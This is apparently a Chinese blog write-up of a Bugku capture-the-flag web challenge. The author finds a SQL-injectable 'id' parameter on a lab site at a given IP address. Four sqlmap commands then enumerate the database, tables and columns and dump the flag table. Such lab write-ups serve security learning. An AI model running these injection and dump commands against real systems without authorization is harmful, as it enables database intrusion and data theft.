新版newbugku-web5-injection Writeup

枫少@KillBoy
枫少@KillBoy
管理员
213
文章
0
粉丝
SQL注入评论31,5703字数 167阅读0分33秒阅读模式

打开网页,看到一个留言板

新版newbugku-web5-injection Writeup-图片1

不知道为什么,看到flag这个字眼就特别兴奋。。。。。于是点进去看看

新版newbugku-web5-injection Writeup-图片2

看到URL地址可能存在SQL注入

http://47.95.208.167:10005/?mod=read&id=1

于是可爱的我打开sqlmap跑一下试试

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" --current-db

新版newbugku-web5-injection Writeup-图片3
卧槽,竟然跑出来了,这题好弱。。。。那我们就找flag吧,爆表。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 --tables –batch

新版newbugku-web5-injection Writeup-图片4
有一个名字叫flag的表,,,继续,爆字段。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag --columns –batch

新版newbugku-web5-injection Writeup-图片5
只有一个flag的字段,,,那就爆数据吧。。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag -C flag --dump  --batch

新版newbugku-web5-injection Writeup-图片6
得到flag。。。。。这题好弱。。

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
枫少@KillBoy
匿名

发表评论

匿名网友

拖动滑块以完成验证